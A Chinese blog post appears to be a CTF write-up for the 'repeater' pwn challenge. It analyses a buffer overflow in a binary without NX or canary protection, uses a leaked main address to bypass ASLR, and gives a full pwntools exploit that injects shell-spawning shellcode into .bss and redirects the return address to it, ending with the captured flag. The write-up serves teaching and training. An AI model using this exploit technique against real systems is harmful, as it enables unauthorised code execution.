repeater【攻防世界】

已于 2022-09-01 21:22:22 修改
阅读量1.6k 收藏 5
点赞数 5
分类专栏: Linux PWN CTF训练 文章标签: PWN 安全 linux
于 2022-09-01 21:18:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/126650028
版权
CTF训练 同时被 3 个专栏收录
46 篇文章 15 订阅
订阅专栏
Linux
37 篇文章 0 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

目录

在这里插入图片描述
没开NX和canary,64位,动态编译,IDA分析
在这里插入图片描述
在这里插入图片描述

分析

这里主要有5处需要注意,图中已经标注。
首先看到4处,即read(0, s, 0x40uLL);结合1处可以知道s为ebp-30h,而这里确为40h,因此存在溢出点
再看v5,当v5=3281697时,会打印main函数地址,这很重要,因为开了地址随机化,我们并不知道main函数地址,而这里能告诉我们,并且可以看到v5和s相差0x20h,可以根据此对v5进行修改。
最后看到3处sub_982(byte_202040, 48LL); byte_202040在bss段的202040处,而这里存放我们第一次输入的东西

题目正常流程:puts(“Please give me your name :”)后我们输入我们的name并存在bas的0x202040处,然后循环v5大小次不断的获取我们的输入(输出read处存在漏洞)

解法

该题解法思路:在name处输入构造的shellcode,这里会将shellcode存入(0x202040),然后通过read函数漏洞修改v5的值,使v5=3281697,在修改v5的值使v5=0,使其退出循环,并且将返回地址指向0x202040,去执行我们的shellcode
其中最难的一步就是找到程序运行时的是shellcode的真实地址,但我们知道shellcode的偏移地址为0x202040,因此只要我们知道整个程序的基地址就能计算得到shellcode真实地址。而基地址=main函数真实地址-main偏移地址,main函数真实地址可以被输出,而main偏移地址查看IDA可知为0xa33
在这里插入图片描述

完整代码

from pwn import *
context.log_level = True
context.arch = 'amd64'
# io = process('./repeater')
io = remote("61.147.171.105",50509)
# 构造shellcode
shellcode = asm(shellcraft.sh())
io.sendlineafter("Please give me your name :", shellcode)
# 修改v5 = 3281697
payload = b'A'*0x20 + p64(0x321321)  # 0x321321:3281697
io.sendlineafter("input :", payload)

io.readuntil('But there is gift for you :\n')
main_addr = int(io.recvuntil("\n"),16)
base_addr = main_addr - 0xa33 # 我们要找到程序的基地址,基地址+bss偏移地址就是shellcode最终实际地址
log.info("base_addr: "+ hex(base_addr))
# 修改v5=0退出循环,并且将返回值指向shellcode地址
payload = b'A'*0x20 + p64(0) + p64(0xdeadbeef) + p64(0xdeadbeef) + p64(base_addr + 0x202040)
io.sendlineafter("input :", payload)
io.interactive()

flag:cyberpeace{8500968831bfb129ab815629d4daf8e2}

Mokapeng
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
asp.net Repeater 自增
10-29
### ASP.NET Repeater 控件自增序号实现详解 在ASP.NET Web开发中,`Repeater`控件因其高度的定制性和灵活性而受到广大开发者的青睐。它允许开发者完全控制HTML输出,使得开发者可以根据实际需求自由地设计列表、...
# repeater-攻防世界
32bin的博客
04-01 351
评论和私信会在第一时间回复。或者我。本博客所有文章除特别声明外,均采用许可协议。转载请注明出处!如果您觉得文章对您有帮助,可以点击文章右下角**【推荐】**一下。
攻防世界-WEB新手练习区教程(一)
tzyyyyyy的博客
11-07 558
攻防世界-WEB新手练习区教程 view_source get_post robots backup cookie disabled_button
攻防世界新手区部分web wp 2
fcz___的博客
02-09 1298
攻防世界web新手区部分wp
PWN做题笔记10-repeater(ALSR绕过)
qq_40923256的博客
05-10 408
泰山杯pwn部分的题目:repeater
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4135
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
repeater-stable
08-02
repeater-stable
Repeater中嵌套Repeater的示例介绍
10-26
在ASP.NET Web Forms开发中,`Repeater`控件是一个非常灵活的数据绑定控件,用于显示数据源中的数据。在某些复杂布局或者需要呈现层次结构数据时,可能会遇到在`Repeater`中嵌套`Repeater`的情况。本示例将详细介绍...
Repeater示例.rar
09-25
在.NET Web Form开发中,`Repeater`控件是一个非常重要的数据绑定控件,它用于显示数据源中的数据集合,可以灵活地自定义布局和样式。尽管随着ASP.NET MVC和ASP.NET Core的流行,Web Form逐渐淡出视线,但很多遗留...
asp:Repeater绑定
05-24
asp:Repeater页面元素,后台绑定,js操作 <asp:Repeater ID="TreatySignTblRowRepeater" runat="server"> <tr class="row"><td class="hidden">;"treatySignID") %></td><td>;"treatyGovernment") %>...
攻防世界之Web新手练习篇
m0_63944500的博客
11-19 2300
写给刚接触CTF的萌新,感谢支持,谨以此文献给去年的自己。
CTF攻防世界web题解题思路XFF-REFERER
m0_63687631的博客
12-25 3062
1.打开网页 2.然抓个包改变下ip 3.用X-Forwarded-For改变ip,如图: 4.因为要重复使用所以要用repeater,然后发送 5. 然后是这样,点击render 6.最后输入referer 7.点render,可得到flag 知识点: 1.ip地址可以用,X-Forwarded-For改 2.referer是就是来源网站。 ...
bugku PWN repeater
alan___的博客
01-15 1068
bugku PWN repeater exp分享
攻防世界pwn刷题记录
最新发布
yw__y的博客
03-12 324
攻防世界RE_ereere
m0_74091653的博客
05-27 853
IDA32打开。
攻防世界 Reverse 新手练习区 1-12 全详解
闵行小鱼塘
11-28 3999
本篇是攻防世界 Reverse 新手练习区的全解
攻防世界reverse新手练习区通关教程
玄道的网安博客
05-25 1387
open-source 下载附件打开来看看,三个条件达成即可 第一个是0xcafe,第二个是满足or的一个数字,第三个是h4cky0u 最后会输出key 把first注释掉,加上参数 编译c文件 gcc 1.c -o 2 ./2 0 25 h4cky0u 最后输出key即可 simple-unpack 我们先用扫描壳工具,发现有upx壳 进行脱壳 upx -d 直接拿去ida搜索flag即可 Logmein 直接加载进ida然后指定main按F5 s是
攻防世界】Reverse——ereere writeup
2301_77295404的博客
01-05 502
要做逆向,所以先解密newBase64(下面的fromBase64函数),然后再decrypt。这样就很清晰,首先对输入进行加密(encrypt),然后在通过一个修改过的Base64函数(仅仅是修改了表的顺序,这个解密方法我在做mobile easyjni那篇博客上有具体步骤,这里不详细解释)。查看strings window,看到字符串“correct”和“wrong“,猜测字符串所在的位置就是我们要分分析的内容。反编译代码发现代码有点乱,因为大部分变量名是没有意义的,是很难读懂的。
[Pwn]格式化字符串漏洞--2018科来杯 repeater
WitherC的练级之路
10-30 544
2018年山东省科来杯Pwn题目Repeater复现 补充一点汇编语言基础知识 对于我这种对汇编语言不怎么感冒的人来说,补充一些相应的汇编语言的基础知识还是很重要的 这里就针对本题中用到的汇编指令进行相应补充 lea与mov的区别:lea eax,[ebx+8]就是将ebx+8这个值直接赋给eax (相当于把地址赋给eax),而不是把ebx+8处的内存地址里的数据赋给eax。 而mov指令则恰恰相反,例如: mov eax,[ebx+8]则是把内存地址为ebx+8处的数据赋给eax。 cmp(compare
攻防世界repeater
08-31
- *2* [repeater攻防世界】](https://blog.csdn.net/qq_41696518/article/details/126650028)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值